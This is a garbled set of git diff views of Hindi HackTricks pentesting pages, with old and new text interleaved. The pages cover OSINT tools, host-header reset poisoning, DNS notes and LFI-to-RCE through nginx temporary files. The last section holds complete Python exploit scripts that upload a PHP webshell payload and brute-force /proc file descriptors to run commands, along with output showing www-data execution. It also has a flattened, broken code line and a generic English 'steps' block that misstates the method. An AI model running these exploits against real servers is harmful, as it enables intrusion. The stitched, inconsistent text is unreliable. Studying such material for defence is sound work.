लीक हुए ईमेल से पासवर्ड प्राप्त करें। व्यावसायिक? लीक हुए ईमेल से पासवर्ड प्राप्त करें।
व्यावसायिक?
# [Binaryedge](https://www.binaryedge.io/) # [Binaryedge](https://www.binaryedge.io/)
IPs से संबंधित दिलचस्प जानकारी प्राप्त करें IPs से दिलचस्प जानकारी प्राप्त करें
# [haveibeenpwned](https://haveibeenpwned.com/) # [haveibeenpwned](https://haveibeenpwned.com/)
डोमेन और ईमेल द्वारा खोजें और पता करें कि क्या यह pwned हुआ है और पासवर्ड। व्यावसायिक? खोजें डोमेन और ईमेल और देखें कि क्या यह पॉन्ड हुआ था और पासवर्ड।
व्यावसायिक?
[https://dnsdumpster.com/](https://dnsdumpster.com/)\(एक व्यावसायिक उपकरण में?\) [https://dnsdumpster.com/](https://dnsdumpster.com/)\(एक व्यावसायिक उपकरण में?\)
[https://www.netcraft.com/](https://www.netcraft.com/) \(एक व्यावसायिक उपकरण में?\) [https://www.netcraft.com/](https://www.netcraft.com/) \(एक व्यावसायिक उपकरण में?\)
[https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/) \(एक व्यावसायिक उपकरण में?\) [https://www.nmmapper.com/sys/tools/subdomainfinder/](https://www.nmmapper.com/) \(एक व्यावसायिक उपकरण में?\)
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs संग्रह**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details

View file

@ -1,34 +1,63 @@
# अन्य वेब ट्रिक्स # अन्य वेब ट्रिक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary>HackTricks का समर्थन करें</summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने ट्रिक्स साझा करें**.
</details> </details>
{% endhint %}
### होस्ट हडर ### होस्ट हडर
कई बार बैक-एंड **होस्ट हैडर** पर भरोसा करता है कि कुछ कार्रवाई करें। उदाहरण के लिए, यह इसका मूल्य उपयोग करके **पासवर्ड रीसेट भेजने के लिए डोमेन** के रूप में इस्तेमाल कर सकता है। तो जब आपको अपना पासवर्ड रीसेट करने के लिए एक लिंक वाला ईमेल मिलता है, तो उपयोग किया जा रहा डोमेन वही होता है जिसे आपने होस्ट हडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं के पासवर्ड रीसेट को अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुराने के लिए अपने नियंत्रण में एक डोमेन पर बदल सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). कई बार बैक-एंड **होस्ट हेडर** पर भरोसा करता है **कुछ क्रियाएँ करने के लिए**। उदाहरण के लिए, यह इसका मूल्य **डोमेन के रूप में उपयोग कर सकता है एक पासवर्ड रीसेट भेजने के लिए**। तो जब आप एक ईमेल प्राप्त करते हैं जिसमें अपना पासवर्ड रीसेट करने के लिए एक लिंक होता है, तो उपयोग किया जा रहा डोमेन वह है जिसे आपने होस्ट हडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं का पासवर्ड रीसेट करने का अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुरा सकते हैं जिसे आपके द्वारा नियंत्रित एक डोमेन में बदल सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
{% hint style="warning" %} {% hint style="warning" %}
ध्यान दें कि यह संभव है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने की प्रतीक्षा नहीं करनी पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण / बॉट इसे विश्लेषण करने के लिए क्लिक करेंगे**। ध्यान दें कि संभना है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने का इंतजार नहीं करना पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण/बॉट इसे विश्लेषित करने के लिए क्लिक करेंगे**।
{% endhint %} {% endhint %}
### सत्र बूलियन ### सत्र बूलियन
कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं, तो बैक-एंड **आपके सत्र में सुरक्षा गुणधर्म के लिए "True" के साथ एक बूलियन जोड़ देगा**। फिर, एक अलग एंडपॉइंट जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\ कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं तो बैक-एंड **केवल एक बूलियन जो मान "सच" है को एक सुरक्षा विशेषता में आपके सत्र में जोड़ देगा**। फिर, एक विभिन्न अंतर्वार्ता जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\
हालांकि, यदि आप **जांच पास करते हैं** और आपके सत्र को सुरक्षा गुणधर्म में "True" मान दिया जाता है, तो आप उन संसाधनों का प्रयास कर सकते हैं जो **उसी गुणधर्म पर निर्भर करते हैं** लेकिन आपको **पहुँचने की अनुमति नहीं होनी चाहिए**। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a). हालांकि, यदि आप **जांच पार करते हैं** और आपके सत्र को सुरक्षा विशेषता में "सच" मान दिया जाता है, तो आप कोशिश कर सकते हैं **अन्य संसाधनों तक पहुंचने** की जो **उसी विशेषता पर निर्भर** करते हैं लेकिन जिनकी आपको **पहुंचने की अनुमति नहीं है**। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
### पंजीकरण कार्यक्षमता ### रजिस्टर कार्यक्षमता
एक पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करने का प्रयास करें। समानार्थक वर्णों (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड) का उपयोग करने का प्रयास करें। पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करने की कोशिश करें। समानांतर वर्ण (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड) का उपयोग करने की कोशिश करें।
### ईमेल का तबादला ### ईमेल का अधिकार
एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टिकरण ईमेल पहले पंजीकृत ईमेल पर भेज एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टि ईमेल पहले पंजीकृत ईमेल पर भेजा जाता है, तो आप किसी भी ईमेल को अधिकार में ले सकते हैं। या यदि आप पहले वाले को दूसरे ईमेल की पुष्टि करने की अनुमति दे सकते हैं, तो आप किसी भी खाता को अधिकार में ले सकते हैं।
### कंपनियों के आटलासियन का आंतरिक सर्विसडेस्क एक्सेस
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
### TRACE विधि
डेवलपर्स कई बार उत्पादन वातावरण में विभिन्न डीबगिंग विकल्पों को अक्षम करना भूल जाते हैं। उदाहरण के लिए, HTTP `TRACE` विधि निदानात्मक उद्देश्यों के लिए डिज़ाइन की गई है। यदि सक्षम है, तो वेब सर्वर उन अनुरोधों का जवाब देगा जो `TRACE` विधि का उपयोग करते हैं और प्रतिक्रिया में उस अनुरोध को गुणाकार करेगा जो प्राप्त किया गया था। यह व्यवहार अक्सर अहानिकारक होता है, लेकिन कभी-कभी सूचना खुलासा करता है, जैसे आंतरिक प्रमाणीकरण हेडरों का नाम जो पुनर्प्रोक्सी द्वारा अनुरोधों में जोड़े जा सकते हैं।![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
{% endhint %}

View file

@ -1,19 +1,5 @@
<details> {% hint style="success" %}
**DNS पर हमलों के बारे में और अधिक अनुसंधान करें**
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
</details>
**DNS पर हमलों के बारे में और अध्ययन करें**
**DNSSEC और DNSSEC3** **DNSSEC और DNSSEC3**
@ -21,16 +7,17 @@ HackTricks का समर्थन करने के अन्य तरी
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
</details> </details>
{% endhint %}

View file

@ -1,4 +1,4 @@
# LFI2RCE एनजिन्क्स टेम्प फ़ाइल्स के माध्यम से # LFI2RCE एनजिन्क्स टेम्प फ़ाइल के माध्यम से
<details> <details>
@ -6,310 +6,108 @@
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **में शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos मे * **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs सबिट करके।
</details> </details>
## संविक्षित कॉन्फ़िगरेशन ### [WhiteIntel](https://whiteintel.io)
**[उदाहरण https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ से](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)** <figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) एक **डार्क-वेब** प्रेरित खोज इंजन है जो **स्टीलर मैलवेयर** द्वारा कंपनी या उसके ग्राहकों को **कंप्रोमाइज़** होने की **मुफ्त** सुविधाएं प्रदान करता है।
WhiteIntel का मुख्य उद्देश्य खाता हासिल करने और रैंसमवेयर हमलों का मुकाबला करना है जो जानकारी चुराने वाले मैलवेयर से होते हैं।
आप उनकी वेबसाइट चेक कर सकते हैं और **मुफ्त** में उनका इंजन ट्राई कर सकते हैं:
{% embed url="https://whiteintel.io" %}
***
## वंलरेबल कॉन्फ़िगरेशन
[**उदाहरण https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
* PHP कोड: * PHP कोड:
\`\`\`\`h\`
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` ध्यान दें: इस उदाहरण में \`/proc/34/fd/15\` को सीधे शामिल नहीं किया जा सकता क्योंकि PHP का \`include\` फ़ंक्शन पथ को \`/var/lib/nginx/body/0000001368 (deleted)\` में विचार करेगा जो फ़ाइल सिस्टम में मौजूद नहीं है। यह छोटी सी प्रतिबंधन को भाग्य से कुछ अंतर्निर्देशन द्वारा उम्मीद है कि उसे उमारा जा सकता है जैसे: \`/proc/self/fd/34/../../../34/fd/15\` जो अंततः हटाई गई \`/var/lib/nginx/body/0000001368\` फ़ाइल की सामग्री को निष्पादित करेगा। ## पूर्ण शोषण \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'
``` ```
<?php include_once($_GET['file']);
```
* FPM / PHP कॉन्फ़िग:
```
...
php_admin_value[session.upload_progress.enabled] = 0
php_admin_value[file_uploads] = 0
...
```
* सेटअप / हार्डनिंग:
```
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
भाग्य से PHP वर्तमान में अक्सर PHP-FPM और Nginx के माध्यम से डिप्लॉय किया जाता है। Nginx एक आसानी से छूट जाने वाली [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) सुविधा प्रदान करता है जो अस्थायी फ़ाइलें लिखेगा अगर ग्राहक बॉडी (पोस्ट को सीमित नहीं किया गया) निश्चित एक सीमा से अधिक है।
यह सुविधा LFIs को उत्पादित किसी अन्य तरीके के बिना शोषित करने की अनुमति देती है, अगर Nginx एक ही उपयोगकर्ता के रूप में PHP के रूप में चलता है (बहुत सामान्य रूप से www-data के रूप में किया जाता है)।
संबंधित Nginx कोड:
```c
ngx_fd_t
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
{
ngx_fd_t fd;
fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
access ? access : 0600);
if (fd != -1 && !persistent) {
(void) unlink((const char *) name);
}
return fd;
}
```
यह स्पष्ट है कि **tempfile को Nginx द्वारा खोलने के तुरंत बाद ही unlinked किया जाता ह।** भाग्य से **procfs का उपयोग किया जा सकता है ताकि रेस के माध्यम से गायब फ़ाइल का संदर्भ प्राप्त किया जा सके:**
```
...
/proc/34/fd:
total 0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```
**ध्यान दें:** इस उदाहरण में `/proc/34/fd/15` को सीधे शामिल नहीं किया जा सकता क्योंकि PHP का `include` फ़ंक्शन पथ को `/var/lib/nginx/body/0000001368 (deleted)` तक हल करेगा जो फ़ाइल सिस्टम में मौजूद नहीं है। यह छोटी सी प्रतिबंध भाग्य से कुछ अंतर्दृष्टि द्वारा उमकर्षित किया जा सकता है जैसे: `/proc/self/fd/34/../../../34/fd/15` जो अंततः हटाई गई `/var/lib/nginx/body/0000001368` फ़ाइल की सामग्री को क्रियान्वित करेगा।
## पूर्ण शोषण
```python
#!/usr/bin/env python3
import sys, threading, requests
# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details
URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'
# find nginx worker processes
r = requests.get(URL, params={
'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')
r = requests.get(URL, params={
'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')
nginx_workers = []
for pid in range(pid_max):
r = requests.get(URL, params={
'file': f'/proc/{pid}/cmdline'
})
if b'nginx: worker process' in r.content:
print(f'[*] nginx worker found: {pid}')
nginx_workers.append(pid)
if len(nginx_workers) >= cpus:
break
done = False
# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
print('[+] starting uploader')
while not done:
requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')
for _ in range(16):
t = threading.Thread(target=uploader)
t.start()
# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid):
global done
while not done:
print(f'[+] brute loop restarted: {pid}')
for fd in range(4, 32):
f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
r = requests.get(URL, params={
'file': f,
'c': f'id'
})
if r.text:
print(f'[!] {f}: {r.text}')
done = True
exit()
for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
```
### LFI to RCE via Nginx Temporary Files
---
#### Introduction
In this scenario, we will exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE) by abusing Nginx temporary files.
#### Steps
1. **Identify Nginx Temporary Directory**: Locate the directory where Nginx stores temporary files. This is typically `/var/lib/nginx/tmp`.
2. **Create a PHP Shell**: Craft a PHP shell and save it with a `.php` extension.
3. **Access the PHP Shell via LFI**: Use the LFI vulnerability to include the PHP shell in a request to the server.
4. **Trigger the PHP Shell**: Access the PHP shell through a URL that corresponds to the Nginx temporary directory, causing the PHP shell to be executed.
5. **Achieve Remote Code Execution**: Once the PHP shell is triggered, you have successfully achieved Remote Code Execution on the server.
#### Conclusion
By leveraging an LFI vulnerability in combination with Nginx temporary files, an attacker can escalate their access and execute arbitrary code on the target system. It is crucial for system administrators to secure their applications and servers to prevent such attacks.
```
$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
[*] nginx worker found: 33
[*] nginx worker found: 34
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] brute loop restarted: 33
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### एक और दुरुपयोग
यह [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/) से है।
```python
import requests
import threading
import multiprocessing
import threading
import random
SERVER = "http://localhost:8088"
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
# Set the following to True to use the above set of PIDs instead of scanning:
USE_NGINX_PIDS_CACHE = False
def create_requests_session():
session = requests.Session()
# Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
session.mount('http://', adapter)
return session
def get_nginx_pids(requests_session):
if USE_NGINX_PIDS_CACHE:
return NGINX_PIDS_CACHE
nginx_pids = set()
# Scan up to PID 200
for i in range(1, 200):
cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
if cmdline.startswith("nginx: worker process"):
nginx_pids.add(i)
return nginx_pids
def send_payload(requests_session, body_size=1024000):
try:
# The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
payload = '<?php system("/readflag"); ?> //'
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload))))) requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
except: except:
pass pass
def send_payload_worker(requests_session):
while True:
send_payload(requests_session)
def send_payload_multiprocess(requests_session):
# Use all CPUs to send the payload as request body for Nginx
for _ in range(multiprocessing.cpu_count()):
p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
p.start()
def generate_random_path_prefix(nginx_pids):
# This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
path = ""
